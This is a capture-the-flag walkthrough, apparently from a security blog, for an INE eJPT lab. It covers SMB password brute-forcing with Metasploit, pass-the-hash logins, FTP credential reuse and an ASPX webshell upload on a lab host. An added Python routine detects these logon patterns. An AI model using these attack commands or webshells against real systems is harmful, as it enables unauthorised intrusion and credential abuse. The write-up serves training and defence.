Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)
Source: infosecwriteups.com, 2026-7-4 04:37:5 (views: 8)

A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.

Suraj Apar

Hello everyone!

In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.

So, let’s dive in.

Q. Looks like SMB user tom has not changed his password for a very long time.

As usual, I started with an Nmap scan and opened Metasploit in parallel:

nmap -T4 -sV -O -sC target.ine.local
service postgresql start && msfconsole -q -x "workspace -a win"

The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser tom
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
run

Got it. With valid credentials, I listed the available SMB shares using smbmap:

smbmap -H target.ine.local -u tom -p <password>

Tom had read access to HRDocuments. I connected and listed the contents:

smbclient //target.ine.local/HRDocuments -U tom --password <password>
smb: \> ls

Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.

Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?

The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser nancy
set pass_file leaked-hashes.txt
run

One hash matched. Each line in the hash file is in <LM_HASH>:<NT_HASH> form; for NTLM authentication over SMB only the NT portion matters, so I used it to connect directly with --pw-nt-hash:

smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash <NT_hash>
smb: \> ls

Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:

smb: \> get hint.txt
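Both smb_login runs above (the wordlist against tom and the hash list against nancy) leave the same footprint on the target: a burst of failed network logons followed by a single success. As an added example that is not part of the original post, the following Python shows how a defender would pick that pattern out of Security log events; the event records and the 10.10.x.x addresses are constructed samples, not data from the lab.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(t, eid, user, src, pkg="NTLM", ltype=3):
    """Stand-in for a Security log record: 4625 = failed logon, 4624 = success.
    LogonType 3 is a network logon, which is what SMB produces."""
    return {"t": t, "id": eid, "user": user, "src": src, "pkg": pkg, "type": ltype}

# Constructed sample: five NTLM failures for tom from one host in five seconds,
# then a success (an smb_login run), plus one benign mistyped interactive
# logon for nancy that must not be reported.
SAMPLE_EVENTS = (
    [ev("2026-07-04T04:30:0%d" % i, 4625, "tom", "10.10.1.5") for i in range(5)]
    + [ev("2026-07-04T04:30:05", 4624, "tom", "10.10.1.5"),
       ev("2026-07-04T04:31:00", 4625, "nancy", "10.10.2.9", "Kerberos", 2),
       ev("2026-07-04T04:31:30", 4624, "nancy", "10.10.2.9", "Kerberos", 2)]
)

def _ts(e):
    return datetime.fromisoformat(e["t"])

def failure_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Map (user, src) -> time the burst crossed the threshold, for every
    source that produced >= threshold network-logon failures within window."""
    fails = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["type"] == 3:
            fails[(e["user"], e["src"])].append(_ts(e))
    bursts = {}
    for key, times in fails.items():
        times.sort()
        for i in range(threshold - 1, len(times)):
            if times[i] - times[i - threshold + 1] <= window:
                bursts[key] = times[i]
                break
    return bursts

def guessing_success(events, threshold=5, window=timedelta(minutes=5)):
    """Pair each burst with the first NTLM network-logon success for the same
    user and source after it: the trace both a wordlist and a hash list leave."""
    bursts = failure_bursts(events, threshold, window)
    hits = []
    for e in sorted(events, key=_ts):
        key = (e["user"], e["src"])
        if (e["id"] == 4624 and e["type"] == 3 and e["pkg"] == "NTLM"
                and key in bursts and _ts(e) >= bursts[key]):
            hits.append((e["user"], e["src"], e["t"]))
            del bursts[key]  # report each burst once
    return hits
```

Feeding real 4625/4624 exports through the same two functions only needs the field mapping in ev() adjusted; the threshold and window are the knobs to tune against normal lockout noise.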

Q. I wonder what the hint found in the previous challenge could be useful for!

I opened the hint file:

cat hint.txt

It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:

ftp ftp://david:<password>@target.ine.local

Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.

Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?

Still in the FTP session, I noticed that the FTP root appeared to be the IIS web root (the same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be served directly by the web server.

I uploaded an ASPX webshell:

ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx

Then opened it in the browser:

http://target.ine.local/cmd.aspx

The webshell gave me a command input field. I ran:

type C:\flag4.txt

Flag 4 returned directly in the browser.

Final Thoughts

This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.

The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it: NTLM authentication uses the NT hash itself as the key material, so possessing the hash is enough to authenticate, and a leaked hash file is often as good as a plaintext password list.

Thanks for reading!

Source: https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine-77fea8b4433d?source=rss----7b722bfd1b8d---4